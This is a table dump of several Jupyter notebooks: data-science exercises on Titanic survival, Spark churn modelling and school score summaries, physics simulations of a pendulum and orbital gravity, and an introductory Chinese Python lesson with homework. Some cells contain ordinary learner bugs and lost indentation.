code
stringlengths 2.5k
150k
| kind
stringclasses 1
value |
|---|---|
```
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
train = pd.read_csv('titanic_train.csv')
test = pd.read_csv('titanic_test.csv')
train.head(5)
train.info()
sns.heatmap(train.isnull(), yticklabels=False, cmap='viridis', cbar=False)
sns.heatmap(test.isnull(), yticklabels=False, cmap='viridis', cbar=False)
sns.countplot(x='Survived', data=train, hue='Sex')
test.columns
sns.distplot(train[train['Survived'] == 1]['Age'].dropna(), hist=False, bins=40, color='r')
sns.distplot(train[train['Survived'] == 0]['Age'].dropna(), hist=False, bins=40)
sns.distplot(train[train['Survived'] == 1]['Fare'], hist=False, bins=40, color='r')
sns.distplot(train[train['Survived'] == 0]['Fare'], hist=False, bins=40)
plt.figure(figsize=(10, 4))
sns.set_style('white', rc={'axes.grid': True})
sns.boxplot(x='Pclass', y='Age', data=train, hue='Sex')
```
you can use sns.axes_style() to return all the styling of the axes and then you can override them with set_style()
```
# we can read the age mean age value for each category but if you want to be very precise!
for pclass in [1, 2, 3]:
for sex in ['male', 'female']:
print(pclass, sex, round(train[(train['Pclass']==pclass) & (train['Sex']==sex)]['Age'].mean(), 2))
```
in order to define our impute function, the best way is to create a nice structured object to avoid many 'if' estatements
```
age_class = {1:{'male': 41.28, 'female': 34.61}, 2: {'male': 30.74, 'female': 28.72}, 3: {'male': 25.51, 'female': 21.7}}
def impute_age(cols):
Age, Pclass, Sex = tuple(cols)
if pd.isnull(Age):
return age_class[Pclass][Sex]
# if pclass==1 and sex=='male': return 41.28
# elif pclass==1 and sex=='female': return 34.61
# elif pclass==2 and sex=='male': return 30.74
# elif pclass==2 and sex=='female': return 28.72
# elif pclass==3 and sex=='male': return 26.51
# else:
# return 21.75
else:
return Age
train['Age'] = train[['Age', 'Pclass', 'Sex']].apply(impute_age, axis=1)
sns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')
train.drop('Cabin', axis=1, inplace=True)
train.dropna(inplace=True)
train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)
train.head()
train.drop(['PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)
train.head()
```
we will not use test dataset because it is basically for kaggle competition. But, let's take a look at it
```
sns.heatmap(test.isnull(), yticklabels=False, cbar=False, cmap='viridis')
test['Age'] = test[['Age', 'Pclass', 'Sex']].apply(impute_age, axis=1)
test.drop('Cabin', axis=1, inplace=True)
test.dropna(inplace=True)
```
We need to convert categorical columns to numerical values using dummy variables
```
test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)
test.drop(['PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)
X = train.drop('Survived', axis=1)
y = train['Survived']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
from sklearn.linear_model import LogisticRegression
logreg = LogisticRegression()
logreg.fit(X_train, y_train)
predictions = logreg.predict(X_test)
from sklearn.metrics import confusion_matrix, classification_report
con_mat = np.array([['TN', 'FP'],
['FN', 'TP']])
pd.DataFrame(data=con_mat, index=['Actual 0', 'Actual 1'], columns=['Predicted 0', 'Predicted 1'])
```
if you go horizontally, you can calculate recall, and vertically yeilds the precision value. avg/Total is the accuracy
```
confusion_matrix(y_test, predictions)
print(classification_report(y_test, predictions))
```
|
github_jupyter
|
## 4. Training
In this part of notebook we will try to train the model using feature extracted dataset and do model evaluation to see how well it predicts churn
### Setup Prerequisite
```
!pip install pyspark
from google.colab import drive
drive.mount('/content/drive')
```
### Import Needed Library, Initialize Spark and Load Dataframe
```
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
from pyspark.ml.classification import GBTClassifier, RandomForestClassifier
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml import Pipeline
from pyspark.ml.tuning import TrainValidationSplit, ParamGridBuilder
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, roc_auc_score, confusion_matrix
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
spark = SparkSession.builder.appName('sparkify-train').getOrCreate()
# load data and change is_churn column into label column
isOnColab = True # CHANGE THIS VARIABLE IF RUNNING ON DATAPROC
path = '/content/drive/MyDrive/datasets/dsnd-sparkify/ml_df.parquet' if isOnColab else 'gs://udacity-dsnd/ml_df.parquet'
df = spark.read.parquet(path)
df = df.withColumn('label', F.when(F.col("is_churn"), 1).otherwise(0))
df.show(5)
```
### Vectorize Feature and Do Train Test Split
```
# features columns
feature_cols = df.columns[3:-1]
assembler = VectorAssembler(inputCols=feature_cols, outputCol="features")
df = assembler.transform(df)
# take only features and label column
df = df.select(["features", "label"])
train_df, test_df = df.randomSplit([0.9,0.1], seed=42)
print("train")
train_df.groupby("label").count().show()
print("test")
test_df.groupby("label").count().show()
```
We have around 1:2 ratio between 1 and 0 label on both dataset. It shows that we have balanced train and test data split.
### Build Grid Search, Train Model and Predict Test Data
In this case we will use gradient boosted tree (GBT) algorithm to predic churn. I use GBT because it has good accuracy but still give us reasonable explainability. For hyperparameter tuning, I tune the tree depth and the number of trees. Then we choose the best model using pyspark built-in BinaryClassificationEvaluator with areaUnderROC metric,
```
train_df.printSchema()
# ML algorithm
gbt = GBTClassifier() # GBT algorithm
rf = RandomForestClassifier() # RF algorithm
# Grid search parameter
gbt_grid = ParamGridBuilder() \
.addGrid(gbt.maxDepth, [5, 6, 7]) \
.addGrid(gbt.maxIter, [15, 20, 25]) \
.build()
rf_grid = ParamGridBuilder() \
.addGrid(rf.maxDepth, [5, 6, 7]) \
.addGrid(rf.numTrees, [15, 20, 25]) \
.build()
# train validation split to search through all grid
gbt_tvs = TrainValidationSplit(estimator=gbt,
estimatorParamMaps=gbt_grid,
evaluator=BinaryClassificationEvaluator(),
trainRatio=0.75,
seed=42)
rf_tvs = TrainValidationSplit(estimator=rf,
estimatorParamMaps=rf_grid,
evaluator=BinaryClassificationEvaluator(),
trainRatio=0.75,
seed=42)
# train model
gbt_model = gbt_tvs.fit(train_df)
rf_model = rf_tvs.fit(train_df)
gbt_model.bestModel
rf_model.bestModel
```
From the result above, the best model is using 25 trees and 7 depth
```
gbt_model.bestModel.featureImportances
```
As seen above, the most important feature in gradient boost model are number 1 (subscription duration) with value 0.2645, number 2 (songs heard per day of subscription) with value 0.1197, number 7 (sessions count) with value 0.087 and number 15 (cancel confirmation page visit) with value 0.109
### Evaluate model
Before evaluate the prediction I create function to ease evaluation later on
```
def evaluate(df, label_col='label', pred_col='prediction'):
'''
INPUT:
df - spark dataframe
label_col - name of label column
pred_col - name of prediction column
OUTPUT:
res - pandas dataframe of metrics
'''
temp_df = df.select([label_col, pred_col]).toPandas()
return pd.DataFrame.from_dict({
"accuracy" : [accuracy_score(temp_df[label_col], temp_df[pred_col])],
"precision" : [precision_score(temp_df[label_col], temp_df[pred_col])],
"recall" : [recall_score(temp_df[label_col], temp_df[pred_col])],
"f1" : [f1_score(temp_df[label_col], temp_df[pred_col])],
"roc_auc" : [roc_auc_score(temp_df[label_col], temp_df[pred_col])],
})
# predict on test dataframe
preds_gbt_df = gbt_model.transform(test_df)
preds_rf_df = rf_model.transform(test_df)
# metrics result
evaluate(preds_gbt_df)
evaluate(preds_rf_df)
# confusion matrix
c_mat_gbt = confusion_matrix(preds_gbt_df.select("label").toPandas(),
preds_gbt_df.select("prediction").toPandas())
c_mat_rf = confusion_matrix(preds_rf_df.select("label").toPandas(),
preds_rf_df.select("prediction").toPandas())
fig, axes = plt.subplots(1,2, figsize=(15,5))
sns.heatmap(c_mat_gbt, annot=True, fmt="d", cmap="YlGnBu", ax=axes[0])
sns.heatmap(c_mat_rf, annot=True, fmt="d", cmap="YlGnBu", ax=axes[1])
axes[0].title.set_text("GBT Model")
axes[1].title.set_text("RF Model")
```
With metrics shown above, We got good f1 and roc auc score. But as you see in the confusion matrix, accuracy value is mostly driven by high true negative value. But We are more concerned about true positive value so we can prevent user from churning. If We want to see how good our model predict churn we can calculate with recall score (312 / (312 + 168)) and get the value of 65%.
### Train Model with Weighted Dataset
Since we are more concerned on increase true positive value, I will use weighted dataset to retrain the model. If the label is negative, I give 0.7 value and positive 1 value.
```
# add weight column
train_df_w = train_df.withColumn("weight", F.when(F.col("label") == 1, 1).otherwise(0.7))
train_df_w.show(5)
```
I use the same model, grid and validation method as before but We need to specify weight column name so they can use it in training process.
```
# gradient boosted tree algorithm
gbt_w = GBTClassifier().setWeightCol("weight")
rf_w = RandomForestClassifier(weightCol="weight")
# train validation split to search through all grid
gbt_tvs_w = TrainValidationSplit(estimator=gbt_w,
estimatorParamMaps=gbt_grid,
evaluator=BinaryClassificationEvaluator().setWeightCol("weight"),
trainRatio=0.75,
seed=42)
rf_tvs_w = TrainValidationSplit(estimator=rf_w,
estimatorParamMaps=rf_grid,
evaluator=BinaryClassificationEvaluator().setWeightCol("weight"),
trainRatio=0.75,
seed=42)
# train model with weighted dataset
gbt_model_w = gbt_tvs_w.fit(train_df_w)
rf_model_w = rf_tvs_w.fit(train_df_w)
gbtw_model.bestModel
```
After training the model is using 20 trees and 7 tree depth
```
gbtw_model.bestModel.featureImportances
```
As seen above, the most influencing features are subscription duration, songs played per day, session count and number of cancellation confirmation page visited. The same as model before but with different value
### Evaluate Weighted Model
```
# predict using weighted model
preds_gbt_w_df = gbt_model_w.transform(test_df)
preds_rf_w_df = rf_model_w.transform(test_df)
evaluate(preds_gbt_w_df)
evaluate(preds_rf_w_df)
# confusion matrix
c_mat_gbt_w = confusion_matrix(preds_gbt_w_df.select("label").toPandas(),
preds_gbt_w_df.select("prediction").toPandas())
c_mat_rf_w = confusion_matrix(preds_rf_w_df.select("label").toPandas(),
preds_rf_w_df.select("prediction").toPandas())
fig, axes = plt.subplots(1,2, figsize=(15,5))
sns.heatmap(c_mat_gbt_w, annot=True, fmt="d", cmap="YlGnBu", ax=axes[0])
sns.heatmap(c_mat_rf_w, annot=True, fmt="d", cmap="YlGnBu", ax=axes[1])
axes[0].title.set_text("GBT Weighted Model")
axes[1].title.set_text("RF Weighted Model")
```
As seen above all the metrics produce better result, especially recall score. But on the down side the number of true negative reduced.
|
github_jupyter
|
# PyCitySChools Solution
* Submitted by: Farshad Esnaashari
* Data Analytics Bootcap
* M-W session
```
# Dependencies and Setup
import pandas as pd
# File to Load (Remember to Change These)
school_data_to_load = "Resources/schools_complete.csv"
student_data_to_load = "Resources/students_complete.csv"
# Read School and Student Data File and store into Pandas Data Frames
school_data = pd.read_csv(school_data_to_load)
student_data = pd.read_csv(student_data_to_load)
# Combine the data into a single dataset
school_data_complete = pd.merge(student_data, school_data, how="left", on=["school_name", "school_name"])
```
## District Summary
* Calculate the total number of schools
* Calculate the total number of students
* Calculate the total budget
* Calculate the average math score
* Calculate the average reading score
* Calculate the overall passing rate (overall average score), i.e. (avg. math score + avg. reading score)/2
* Calculate the percentage of students with a passing math score (70 or greater)
* Calculate the percentage of students with a passing reading score (70 or greater)
* Create a dataframe to hold the above results
* Optional: give the displayed data cleaner formatting
```
#Calculate total student in the school_data
total_schools=school_data["school_name"].count()
#Calculate total number of students (use size column) in the school_data
total_students= school_data["size"].sum()
#calculate total budget (use budget in the school_data)
total_budget = school_data["budget"].sum()
#calculate average math score in the student_data
average_math_score =student_data["math_score"].mean()
#Calcilate avergage readning score in the student_data
average_reading_score=student_data["reading_score"].mean()
# Use the loc function to create a subset a dataframe with students passing math
students_passing_math = student_data.loc[student_data["math_score"] >= 70]
# Calculate percent passing math
pct_passing_math = 100*students_passing_math["student_name"].count()/total_students
#Use the loc function to create a dataframe with students passing reading
students_passing_reading = student_data.loc[student_data["reading_score"] >= 70]
#calculte percent passing reading
pct_passing_reading = 100* students_passing_reading["student_name"].count()/total_students
# put the results in a data frame called district_summary
district_summary=pd.DataFrame({"Total Schools":[total_schools],
"Total Students": [total_students],
"Total Budget": [total_budget],
"Average Math Score": [average_math_score],
"Average Reading Score": [average_reading_score],
"% Passing Math": [pct_passing_math],
"% Passing Reading": [pct_passing_reading],
"% Overall Passing Rate": [(average_math_score+average_reading_score)/2]})
# Use Map to format the total students and total buddget columns
district_summary["Total Students"]=district_summary["Total Students"].map("{:,}".format)
district_summary["Total Budget"]=district_summary["Total Budget"].map("${:,.2f}".format)
#display the dataframe
district_summary.head()
```
## School Summary
* Create an overview table that summarizes key metrics about each school, including:
* School Name
* School Type
* Total Students
* Total School Budget
* Per Student Budget
* Average Math Score
* Average Reading Score
* % Passing Math
* % Passing Reading
* Overall Passing Rate (Average of the above two)
* Create a dataframe to hold the above results
```
# (Note: I used the new groupby aggregation function with relabeling that is already available
# in my current PythonData installation.
# To create the school summary, I create dataframes in 4 steps:
#step 1: create school_df_1 for average math and reading scores
school_df_1 = school_data_complete.groupby('school_name').agg(
total_students=('student_name', 'count'),
avg_math_score =('math_score','mean'),
avg_reading_score = ('reading_score','mean'))
#Step 2.a: create a dataframe to hold students with passig math scores (>=70)
passing_math_df= school_data_complete.loc[school_data_complete['math_score'] >=70]
#Step 2.b: # group passing math dataframe by school_name and count the rows
school_df_2 = passing_math_df.groupby('school_name').agg(
total_passing_math = ('student_name','count'))
#step 3.a: create a dataframe to hold students with passing reading scores (>=70)
passing_reading_df= school_data_complete.loc[school_data_complete['reading_score'] >=70]
#step 3.b: group passing reading dataframe by school_name and count the rows
school_df_3 = passing_reading_df.groupby('school_name').agg(
total_passing_reading = ('student_name','count'))
# Step 4: create a dataframe from the school_data with subset of school_name, type, budget, and size
school_df_4 = school_data.loc[:,['school_name','type','budget', 'size']]
# merge the previous 4 dataframes (school_df_1 to school_Df_4) into a school_summary dataframe
school_summary = pd.merge(school_df_1, school_df_2, on='school_name')
school_summary = pd.merge(school_summary, school_df_3, on='school_name')
school_summary = pd.merge(school_summary, school_df_4, on='school_name')
# Calculate percent passing math into a new column
school_summary["pct_passing_math"]= 100*school_summary["total_passing_math"]/school_summary["total_students"]
# Calciate percent passing reading into a new column
school_summary['pct_passing_reading'] = 100*school_summary["total_passing_reading"]/school_summary["total_students"]
# create a new column for percent overall passing rate
school_summary['overall_passing_rate'] = (school_summary['pct_passing_math']+ \
school_summary['pct_passing_reading'])/2
# create a new column for per student budget
school_summary['per_student_budget'] = school_summary['budget']/school_summary['size']
# Reorganize the columns using a list
school_summary = school_summary[['school_name','type', 'total_students',
'budget', 'per_student_budget',
'avg_math_score', 'avg_reading_score',
'pct_passing_math', 'pct_passing_reading',
'overall_passing_rate']]
# Rename the columns
school_summary = school_summary.rename(columns={"type":"School Type",
"total_students": "Total Students",
"budget": "Total School Budget",
"per_student_budget": "Per Student Budget",
"avg_math_score": "Average Math Score",
"avg_reading_score": "Average Reading Score",
"pct_passing_math": "% Passing Math",
"pct_passing_reading": "% Passing Reading",
"overall_passing_rate": "% Overall Passing Rate"})
#Format columns for Total School Budget, Per Student Budget using the map function
school_summary["Total School Budget"] = school_summary["Total School Budget"].map("${:,.2f}".format)
school_summary["Per Student Budget"] = school_summary["Per Student Budget"].map("${:,.2f}".format)
# school_summary = school_summary.set_index("school_name")
```
## Top Performing Schools (By Passing Rate)
* Sort and display the top five schools in overall passing rate
```
#sort the school_summary dataframe on overall_passing_rate in descening order
top_5_schools = school_summary.sort_values("% Overall Passing Rate", ascending=False)
top_5_schools.set_index("school_name",inplace=True)
top_5_schools.head()
```
## Bottom Performing Schools (By Passing Rate)
* Sort and display the five worst-performing schools
```
# sort the school_summary dataframe on overall_passing_rate in ascending order
bottom_5_schools = school_summary.sort_values("% Overall Passing Rate")
bottom_5_schools.set_index("school_name", inplace=True)
bottom_5_schools.head()
```
## Math Scores by Grade
* Create a table that lists the average Reading Score for students of each grade level (9th, 10th, 11th, 12th) at each school.
* Create a pandas series for each grade. Hint: use a conditional statement.
* Group each series by school
* Combine the series into a dataframe
* Optional: give the displayed data cleaner formatting
```
# Use the "loc" function with conditional filtering to build 4 dataframes for grades 9 to 12 avergae scores
nine_grade = school_data_complete.loc[school_data_complete["grade"] =="9th"].rename(columns={"math_score": "9th"})
ten_grade = school_data_complete.loc[school_data_complete["grade"] =="10th"].rename(columns={"math_score": "10th"})
eleven_grade = school_data_complete.loc[school_data_complete["grade"] =="11th"].rename(columns={"math_score": "11th"})
twelve_grade = school_data_complete.loc[school_data_complete["grade"] =="12th"].rename(columns={"math_score": "12th"})
# calculate the averge math scores for each frame grouped by school_name
avg_9_grades = nine_grade.groupby('school_name').agg({'9th':'mean'})
avg_10_grades = ten_grade.groupby('school_name').agg({'10th':'mean'})
avg_11_grades = eleven_grade.groupby('school_name').agg({'11th':'mean'})
avg_12_grades = twelve_grade.groupby('school_name').agg({'12th': 'mean'})
#merge the 4 dataframes into math_scores_by_grade
math_scores_by_grade = pd.merge(avg_9_grades, avg_10_grades, on="school_name")
math_scores_by_grade = pd.merge(math_scores_by_grade, avg_11_grades, on="school_name")
math_scores_by_grade = pd.merge(math_scores_by_grade, avg_12_grades, on="school_name")
math_scores_by_grade
```
## Reading Score by Grade
* Perform the same operations as above for reading scores
```
# build 4 dataframes for average scores in grades 9 to 12
nine_grade = school_data_complete.loc[school_data_complete["grade"] =="9th"].rename(columns={"reading_score": "9th"})
ten_grade = school_data_complete.loc[school_data_complete["grade"] =="10th"].rename(columns={"reading_score": "10th"})
eleven_grade = school_data_complete.loc[school_data_complete["grade"] =="11th"].rename(columns={"reading_score": "11th"})
twelve_grade = school_data_complete.loc[school_data_complete["grade"] =="12th"].rename(columns={"reading_score": "12th"})
# group by school_name and calculate the reading score average for each grade
avg_9_grades = nine_grade.groupby('school_name').agg({'9th':'mean'})
avg_10_grades = ten_grade.groupby('school_name').agg({'10th':'mean'})
avg_11_grades = eleven_grade.groupby('school_name').agg({'11th':'mean'})
avg_12_grades = twelve_grade.groupby('school_name').agg({'12th':'mean'})
# merge the 4 dataframes into the read_scores_by_grade
reading_scores_by_grade = pd.merge(avg_9_grades, avg_10_grades, on="school_name")
reading_scores_by_grade = pd.merge(reading_scores_by_grade, avg_11_grades, on="school_name")
reading_scores_by_grade = pd.merge(reading_scores_by_grade, avg_12_grades, on="school_name")
reading_scores_by_grade
```
## Scores by School Spending
* Create a table that breaks down school performances based on average Spending Ranges (Per Student). Use 4 reasonable bins to group school spending. Include in the table each of the following:
* Average Math Score
* Average Reading Score
* % Passing Math
* % Passing Reading
* Overall Passing Rate (Average of the above two)
```
# Set bins and group names for ranges of per student spending
spending_bins = [0, 585, 615, 645, 675]
group_names = ["<$585", "$585-615", "$615-645", "$645-675"]
# create dataframe with subset of columns from the school summary using the loc function
summary_by_spending=school_summary.loc[:,["Per Student Budget", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
#cast Per Student Budget(in $s) into a float
summary_by_spending["Per Student Budget"]= summary_by_spending["Per Student Budget"].str.slice(start=1).astype(float)
# bin the spending per student
summary_by_spending["Spending Ranges (Per Student)"]= pd.cut(summary_by_spending["Per Student Budget"],
spending_bins, labels=group_names)
# group data by the bins
summary_by_spending = summary_by_spending.groupby("Spending Ranges (Per Student)").agg(
{'Average Math Score': 'mean',
'Average Reading Score': 'mean',
'% Passing Math':'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_spending
```
## Scores by School Size
* Perform the same operations as above, based on school size.
```
# create lists for size ranges and group_names
size_bins = [0, 1000, 2000, 5000]
group_names = ["Small (<1000)", "Medium (1000-2000)", "Large (2000-5000)"]
# create a subset dataframe from the school summary
summary_by_size=school_summary.loc[:,["Total Students", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
# bin the school student sizes in the dataframe
summary_by_size["School Size"]= pd.cut(summary_by_size["Total Students"],
size_bins, labels=group_names)
# group by the school size
summary_by_size = summary_by_size.groupby("School Size").agg(
{'Average Math Score': 'mean',
'Average Reading Score': 'mean',
'% Passing Math': 'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_size
```
## Scores by School Type
* Perform the same operations as above, based on school type.
```
# create a dataframe with subset of columns from the school summary
summary_by_type=school_summary.loc[:,["School Type", "Average Math Score",
"Average Reading Score", "% Passing Math",
"% Passing Reading", "% Overall Passing Rate" ]]
# group by school type and do the statistices using the agg function
summary_by_type = summary_by_type.groupby("School Type").agg(
{'Average Math Score':'mean',
'Average Reading Score': 'mean',
'% Passing Math': 'mean',
'% Passing Reading': 'mean',
'% Overall Passing Rate': 'mean'})
summary_by_type
```
|
github_jupyter
|
```
import numpy as np
import matplotlib.pyplot as plt
from ipywidgets import interact, fixed
import ipywidgets as widgets
```
Zasymuluj wahadlo matematyczne rozwiazując numerycznie rownanie różniczkowe je opisujace
(rownież dla dużych wychyleń).
$$
\frac{d^2x}{dt^2} + \frac{g}{l} sin(x) = 0
$$
```
g = 9.81
l = 1
def pendulum(initial_theta, time, initial_omega=0, time_step=0.01, g=g, l=l):
theta = initial_theta
omega = initial_omega
t = 0
while(t < time):
a = -(g / l) * np.sin(theta)
omega += a * time_step
theta += omega * time_step + a * (time_step ** 2) /2
t += time_step
return theta
omega = 1 / np.sqrt(l /g) # = 2*Pi / T (where T = 2*Pi sqrt(l/g))
step = 0.001
T = np.arange(0,30,0.1)
Theta = np.array([pendulum(np.pi / 16, t, time_step=step) for t in T])
actual_theta = np.cos(omega * T)
plt.plot(T, Theta)
plt.plot(T, actual_theta)
plt.show()
def demonstrate_pendulum(initial_theta, time, initial_omega=0, time_step_magn=-2, g=9.8, l=1):
time_step = 10**time_step_magn
theta = pendulum(initial_theta, time, initial_omega, time_step, g)
x = np.sin(theta)
y = - np.sqrt(l**2 - x**2)
line_x = np.linspace(x,0)
line_y = np.linspace(y,0)
plt.scatter(x,y)
plt.plot(line_x, line_y, color='black')
plt.scatter([0],[0])
plt.axis((-1, 1, -2, 0.5))
plt.show()
interact(demonstrate_pendulum,
time=widgets.FloatSlider(min=0, max=1000, value=0, step=0.01),
initial_theta=widgets.FloatSlider(min=0, max=2*np.pi, value=np.pi/4, step=0.01),
time_step_magn=widgets.IntSlider(min=-5, max=5, value=-2)
)
```
Zasymuluj układ grawitacyjny : gwiazda i przylatujace cialo niebieskie z pewna (zadawana
przez uzytkownika) prędkością poczatkową.
$$
g = G\frac{M}{r^2}
$$
```
@np.vectorize
def g(r, G=1, M=1, r_max=1):
return (G * M) / r**2 if r > r_max else ((G * M) / r_max**2) * (r / r_max)
def gravity(time, initial_pos, M=0, initial_v=0, time_step=0.1, r_max=1):
t = 0
x = initial_pos
v = initial_v
r = np.abs(x)
a = - g(r, M=M, r_max=r_max) * (x / r)
X = [x]
while(t < time):
r = np.abs(x)
a = - g(r, M=M, r_max=r_max) * (x / r)
v += a * time_step
x += v * time_step + a * ((time_step ** 2) / 2)
t += time_step
X.append(x)
return np.array(X), v, a
def demonstrate_gravity(time, in_x, in_y, in_vx, in_vy, time_step_magn, M, r_max):
pos = in_x + in_y * 1j
v = in_vx + in_vy * 1j
time_step = 10**time_step_magn
pos, v, a = gravity(time, pos, initial_v=v, M=M, r_max=r_max)
X = np.real(pos)
Y = np.imag(pos)
x = X[-1]
y = Y[-1]
line_x = np.linspace(x,0)
line_y = np.linspace(y,0)
v_x = np.real(v)
v_y = np.imag(v)
line_v_x = np.linspace(x, x + v_x)
line_v_y = np.linspace(y, y + v_y)
a_x = np.real(a)
a_y = np.imag(a)
line_a_x = np.linspace(x, x + a_x)
line_a_y = np.linspace(y, y + a_y)
print(x, y)
print(v)
print(a)
ax=plt.gca()
ax.add_patch(plt.Circle((0,0), r_max, color='r', fill=False))
plt.scatter([0],[0], color='red')
plt.scatter(x,y, color='blue')
plt.plot(X, Y, color='blue')
plt.plot(line_v_x, line_v_y, color='green')
plt.scatter([x + v_x], [y + v_y], color='green', marker='^')
plt.plot(line_a_x, line_a_y, color='purple')
plt.scatter([x + a_x], [y + a_y], color='purple', marker='^')
plt.axis((-5, 5, -5, 5))
plt.show()
interact(demonstrate_gravity,
time=widgets.FloatSlider(min=0, max=1000, value=0, step=0.1),
time_step_magn=widgets.IntSlider(min=-5, max=5, value=-3),
in_x=widgets.FloatSlider(min=-5, max=5, value=2, step=0.1),
in_y=widgets.FloatSlider(min=-5, max=5, value=2, step=0.1),
in_vx=widgets.FloatSlider(min=-5, max=5, value=-0.5, step=0.1),
in_vy=widgets.FloatSlider(min=-5, max=5, value=0.5, step=0.1),
M=widgets.FloatSlider(min=0, max=10, value=1, step=0.1),
r_max=widgets.FloatSlider(min=0, max=2, value=1, step=0.1)
)
plt.Circle((0,0), 1, color='r')
plt.show()
```
|
github_jupyter
|
# 基本程序设计
- 一切代码输入,请使用英文输入法
```
print('joker is bad man')
```
## 编写一个简单的程序
- 圆公式面积: area = radius \* radius \* 3.1415
### 在Python里面不需要定义数据的类型
```
radius = 100 # 定义变量
area = radius * radius * 3.14 # 普通代码,* 代表乘法
print(area) # 最后打印出结果
```
## 控制台的读取与输入
- input 输入进去的是字符串
- eval
- 在jupyter用shift + tab 键可以跳出解释文档
```
variable = input('请输入一个数字')
print(variable)
```
## 变量命名的规范
- 由字母、数字、下划线构成
- 不能以数字开头 \*
- 标识符不能是关键词(实际上是可以强制改变的,但是对于代码规范而言是极其不适合)
- 可以是任意长度
- 驼峰式命名
```
print(12)
import os
def go(num):
os.system('echo hahah')
print = go
print(12)
```
## 变量、赋值语句和赋值表达式
- 变量: 通俗理解为可以变化的量
- x = 2 \* x + 1 在数学中是一个方程,而在语言中它是一个表达式
- test = test + 1 \* 变量在赋值之前必须有值
```
x = 100
x = 2 * x + 1 # 赋值语句,在赋值之前,一定要有值
print(x)
a = eval(input('数字'))
print(type(a))
print(a * 3)
```
## 同时赋值
var1, var2,var3... = exp1,exp2,exp3...
```
Joekr, Mistt,hahah,lalal = 'lalal',120,120.33333,True
print(Joekr,Mistt,hahah,lalal)
```
## 定义常量
- 常量:表示一种定值标识符,适合于多次使用的场景。比如PI
- 注意:在其他低级语言中如果定义了常量,那么,该常量是不可以被改变的,但是在Python中一切皆对象,常量也是可以被改变的
```
chart = 100.1
chart = 'hahahah'
chart = True
print(chart)
import math
print(math.pi)
```
## 数值数据类型和运算符
- 在Python中有两种数值类型(int 和 float)适用于加减乘除、模、幂次
<img src = "../Photo/01.jpg"></img>
## 运算符 /、//、**
```
number1 = 100
number2 = 500
print(number1 + number2)
number3 = 100.0
number4 = 500.0
print(number3 + number4)
number3 = 100.0
number4 = 500.0
print(number3 - number4)
number3 = 100.0
number4 = 500.0
print(number3 * number4)
number3 = 100.0
number4 = 500.0
print(number3 / number4)
number3 = 100.0
number4 = 500.0
print(number3 // number4)
number3 = 100.0
number4 = 2
print(number3 ** number4)
```
## 运算符 %
```
number3 = 100.0
number4 = 500.0
print(number3 % number4)
```
## EP:
- 25/4 多少,如果要将其转变为整数该怎么改写
- 输入一个数字判断是奇数还是偶数
- 进阶: 输入一个秒数,写一个程序将其转换成分和秒:例如500秒等于8分20秒
- 进阶: 如果今天是星期六,那么10天以后是星期几? 提示:每个星期的第0天是星期天
```
res = 25//4
print(res)
input_number = input('input number')
input_number_int = eval(input_number)
if input_number_int == int:
if input_number_int % 2 == 0:
print('偶数')
else:
print('奇数')
else:
if input_number_int % 2.0 == 0.0:
print('偶数')
else:
print('奇数')
time = eval(input('input'))
fen = time // 60
miao = time % 60
print(fen,'分',miao,'秒')
print('%d分%d秒'%(fen,miao))
time1 = 6
time2 = eval(input('输入'))
result = (time1 + time2) % 7
print(result)
```
## 科学计数法
- 1.234e+2
- 1.234e-2
```
num1=1.234e+2
num2 = 1.234e-2
print(num1,num2)
```
## 计算表达式和运算优先级
<img src = "../Photo/02.png"></img>
<img src = "../Photo/03.png"></img>
```
x = eval(input('x'))
y = eval(input('y'))
a = eval(input('a'))
b = eval(input('b'))
c = eval(input('c'))
part_1 = (3 + 4 * x) / 5
part_2 = (10 * (y-5)* (a+b+c))/ x
part_3 = 9*(4/x + (9+x)/y)
print(part_1 - part_2 + part_3)
```
## 增强型赋值运算
<img src = "../Photo/04.png"></img>
```
a = 1
a += 100 # a = a + 100
print(a)
```
## 类型转换
- float -> int
- 四舍五入 round
```
int(25 / 4) # 转换成整型
str(25 / 4) # 转换成字符串
float(25//5) # 转换成浮点
round(25/4,1) # 四舍五入
```
## EP:
- 如果一个年营业税为0.06%,那么对于197.55e+2的年收入,需要交税为多少?(结果保留2为小数)
- 必须使用科学计数法
```
water_floawer = 153
bai = 153 //100
shi = 153 //10 % 10
ge = 153 % 10
if water_floawer == bai ** 3 + shi **3 + ge **3:
print('是水仙花')
else:
print('NO')
round(197.55e+2 * 0.06e-2,2)
```
# Project
- 用Python写一个贷款计算器程序:输入的是月供(monthlyPayment) 输出的是总还款数(totalpayment)

```
贷款数 = eval(input('请输入贷款数'))
月利率 = eval(input('月利率'))
年限 = eval(input('年限'))
月供= ( (贷款数 * 月利率) / (1-(1/(1+月利率)**(年限*12))))
总还款数 = 月供 * 年限 * 12
print(总还款数)
import time
print(time.time())
```
# Homework
- 1
<img src="../Photo/06.png"></img>
```
celsius=eval(input("请输入摄氏温度"))
fahrenheit=(9/5)*celsius+32
print(fahrenheit)
```
- 2
<img src="../Photo/07.png"></img>
```
pi=3.14
radius=eval(input("请输入半径"))
length=eval(input("请输入高"))
area=radius*radius*pi
volume=area*length
print(area)
print(volume)
```
- 3
<img src="../Photo/08.png"></img>
```
yingchi=eval(input("请输入英尺数"))
michi=yingchi*0.305
print(michi)
```
- 4
<img src="../Photo/10.png"></img>
```
water_amount=eval(input("请输入水量"))
temperature_ini=eval(input("请输入初始温度"))
temperature_fin=eval(input("请输入最终温度"))
Q=water_amount*(temperature_fin-temperature_ini)*4184
print(Q)
```
